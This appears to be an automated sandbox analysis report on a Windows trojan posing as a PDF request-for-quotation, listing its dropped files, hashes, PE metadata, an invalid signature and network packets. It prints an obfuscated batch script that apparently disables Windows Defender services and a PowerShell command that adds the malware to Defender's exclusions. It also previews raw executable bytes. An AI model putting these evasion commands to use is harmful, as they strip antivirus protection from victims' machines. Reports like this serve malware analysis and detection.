                                                                                                                                        SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                        SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                        SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: DHL_document1102202068090891.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: RMe2JcmlSh.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PO#87498746510.exe, Detection: malicious, Browse
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat
                                                                                                                                        Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):8399
                                                                                                                                        Entropy (8bit):4.665734428420432
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                                        MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                                        SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                                        SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                                        SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3aln3cm2.fvg.psm1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ase23bt1.0jr.psm1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_um20px0m.b2q.ps1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjtgwnqe.3ox.ps1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\Documents\20210225\PowerShell_transcript.124406._cDteu59.20210225151550.txt
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):880
                                                                                                                                        Entropy (8bit):5.335445416144854
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:BxSAfdZOvBdaFx2DOXUWeSuhPW+HjeTKKjX4CIym1ZJXkuhX:BZKv6FoO+S5+qDYB1ZuC
                                                                                                                                        MD5:FEE84AAAD6A09CC40CDC464593CCB89D
                                                                                                                                        SHA1:6BA52DD0209C9A5D83895F3EE63D8574BFB8A57B
                                                                                                                                        SHA-256:9CCC90B543C28B2AEFA6863D1DB807F29DCCE15390F6C10097EEB985D62DB0E1
                                                                                                                                        SHA-512:C5CDF23B3C171FE82748F220772B041520C0CE2FE9060D8A8C3AEA972F43946BA8EDA05E8725C9DF0F7F3B8CBA229B1B48F468319C53CD338FEE06CDFA6A1188
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe -Force..Process ID: 6736..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151618..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe -Force..
                                                                                                                                        C:\Users\user\Documents\20210225\PowerShell_transcript.124406.eRYFyRTS.20210225151530.txt
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4138
                                                                                                                                        Entropy (8bit):5.444454627353464
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:BZg6FNfoqDo1ZpOZ26FNfoqDo1ZoLP9PzPjZl6FNfoqDo1ZA:k
                                                                                                                                        MD5:D9DB1A3F8EAF271CFDAB2E26568D8D2B
                                                                                                                                        SHA1:967C29FC2B6CC9D9FBD25B3E1041D2631E3AC987
                                                                                                                                        SHA-256:259F5851FDA5298F95BEFB506FF8F7EE1F966D27BE23DEF1CAEA8483B422A36A
                                                                                                                                        SHA-512:857E32BDF165D9B3FD01892C320BF1EC8C8830EE0BF9AC62C2B5B05A33F687C1841E749BC895B264581CC47EACD8758FFF853D6C37026189D737D4A06840BE29
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151545..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe -Force..Process ID: 5688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151545..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151851..Use
                                                                                                                                        C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
                                                                                                                                        Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):117936
                                                                                                                                        Entropy (8bit):6.528297707209392
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:UC154NoTCiLdp99RDmmym7mVmLmZm7mDm7vym8mLYiUmXuSHwE7tXuItiR40Xt4W:/zTCiLXBlHzD2pB7lQSVML/hy
                                                                                                                                        MD5:C1B250F45DE606EF95AF9961496402A0
                                                                                                                                        SHA1:A222DA21DBD932D64F9CAD12B46C068AC7360F72
                                                                                                                                        SHA-256:CDB8CF995F8287A1F64CD035C4E34E047E23A3218DBF50B0FCF321ECD464094E
                                                                                                                                        SHA-512:4C09A6D12F85300D45CFDDFEC43A49EBAE676D667FF3B4E86585BB20CA5CF73FB1AB67488D32C66CCE8E9F1DDBD28FC503F187999A93B641BC22A75347530BCC
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.................. ........@.. ....................... ............@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........&..T............................................................*..(....*..(....*jr...prR..p~....o....(....*~s ........s!........s.........*Bs....o....o"...*.r...p(.....(#....(#...s....&.(.....(.....(....*...0..........r...pr...p~....o.....s......%r...pr.B.p~....o....o....%rYC.pr...p~....o....o....%r...pr...p~....o....o.....o.....8......(......~....+........o......r?..pr...p~....o....o....,..r...pr...p~....o....r...pr...p~....o....o......rn..pr7..p~....o....r_..pr_..
                                                                                                                                        C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe:Zone.Identifier
                                                                                                                                        Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):55
                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Entropy (8bit):6.528297707209392
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:RFQ - REF 208056-pdf.exe
                                                                                                                                        File size:117936
                                                                                                                                        MD5:c1b250f45de606ef95af9961496402a0
                                                                                                                                        SHA1:a222da21dbd932d64f9cad12b46c068ac7360f72
                                                                                                                                        SHA256:cdb8cf995f8287a1f64cd035c4e34e047e23a3218dbf50b0fcf321ecd464094e
                                                                                                                                        SHA512:4c09a6d12f85300d45cfddfec43a49ebae676d667ff3b4e86585bb20ca5cf73fb1ab67488d32c66cce8e9f1ddbd28fc503f187999a93b641bc22a75347530bcc
                                                                                                                                        SSDEEP:384:UC154NoTCiLdp99RDmmym7mVmLmZm7mDm7vym8mLYiUmXuSHwE7tXuItiR40Xt4W:/zTCiLXBlHzD2pB7lQSVML/hy
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bE..........."...0.................. ........@.. ....................... ............@................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:00828e8e8686b000

                                                                                                                                        Static PE Info

                                                                                                                                        General

                                                                                                                                        Entrypoint:0x41cf9e
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                        Time Stamp:0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                                                                        OS Version Major:4
                                                                                                                                        OS Version Minor:0
                                                                                                                                        File Version Major:4
                                                                                                                                        File Version Minor:0
                                                                                                                                        Subsystem Version Major:4
                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                        Authenticode Signature

                                                                                                                                        Signature Valid:false
                                                                                                                                        Signature Issuer:C=pWVehoyZhbqvGvOnyjflC, S=JWVPAYtFJFrnfBtiaEOrjunCnPVqr, L=WBoOmetEMoGEKeXmsi, T=exJgtNaepyEjEdPEBoHdAzLvAPdWgdfvzHhZeCUctUixpYvU, E=AmxNJnQuYxWUhZXLgPdTiT, OU=pmskCxyXHpHOaImSipI, O=TOHpToCMywEdpGEOZenYyaFrGscfYOiOIqiHUSe, CN=cwcpbvBhYEPeJYcCNDldHTnGK
                                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                        Error Number:-2146762487
                                                                                                                                        Not Before, Not After
                                                                                                                                        • 2/24/2021 11:33:07 PM 2/24/2022 11:33:07 PM
                                                                                                                                        Subject Chain
                                                                                                                                        • C=pWVehoyZhbqvGvOnyjflC, S=JWVPAYtFJFrnfBtiaEOrjunCnPVqr, L=WBoOmetEMoGEKeXmsi, T=exJgtNaepyEjEdPEBoHdAzLvAPdWgdfvzHhZeCUctUixpYvU, E=AmxNJnQuYxWUhZXLgPdTiT, OU=pmskCxyXHpHOaImSipI, O=TOHpToCMywEdpGEOZenYyaFrGscfYOiOIqiHUSe, CN=cwcpbvBhYEPeJYcCNDldHTnGK
                                                                                                                                        Version:3
                                                                                                                                        Thumbprint MD5:8A446DD2BF81F6DCA3F2E70289F260C9
                                                                                                                                        Thumbprint SHA-1:49EC0580239C07DA4FFBA56DC8617A8C94119C69
                                                                                                                                        Thumbprint SHA-256:7C120D01DFB5D8540763A96DEE45DA554BF1373A08AE5E29BB38FB557086D5C7
                                                                                                                                        Serial:19985190B09206952EFD412D3CCC18E2

                                                                                                                                        Entrypoint Preview

                                                                                                                                        Instruction
                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al
                                                                                                                                        add byte ptr [eax], al

                                                                                                                                        Data Directories

                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1cf4c0x4f.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e0000x3e0.rsrc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x1b8000x14b0.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000xc.reloc
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                        Sections

                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                        .text0x20000x1afa40x1b000False0.085765697338data6.4427787872IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                        .rsrc0x1e0000x3e00x400False0.4599609375data3.54265996663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                        .reloc0x200000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                        Resources

                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                        RT_VERSION0x1e0580x388dataEnglishUnited States

                                                                                                                                        Imports

                                                                                                                                        DLLImport
                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                        Version Infos

                                                                                                                                        DescriptionData
                                                                                                                                        LegalCopyrightCopyright 2022 LyZnAXxP. All rights reserved.
                                                                                                                                        Assembly Version2.8.1.0
                                                                                                                                        InternalNameTEwJVelt.exe
                                                                                                                                        FileVersion5.5.3.4
                                                                                                                                        CompanyNameIEACZUBa
                                                                                                                                        LegalTrademarksVxoadekR
                                                                                                                                        CommentsIvxoyvzg
                                                                                                                                        ProductNameTEwJVelt
                                                                                                                                        ProductVersion2.8.1.0
                                                                                                                                        FileDescriptionWFybxfIh
                                                                                                                                        OriginalFilenameTEwJVelt.exe
                                                                                                                                        Translation0x0409 0x0514

                                                                                                                                        Possible Origin

                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                        EnglishUnited States

                                                                                                                                        Network Behavior

                                                                                                                                        Network Port Distribution

                                                                                                                                        TCP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Feb 25, 2021 15:14:52.311490059 CET4970880192.168.2.7172.67.172.17
                                                                                                                                        Feb 25, 2021 15:14:52.364129066 CET8049708172.67.172.17192.168.2.7
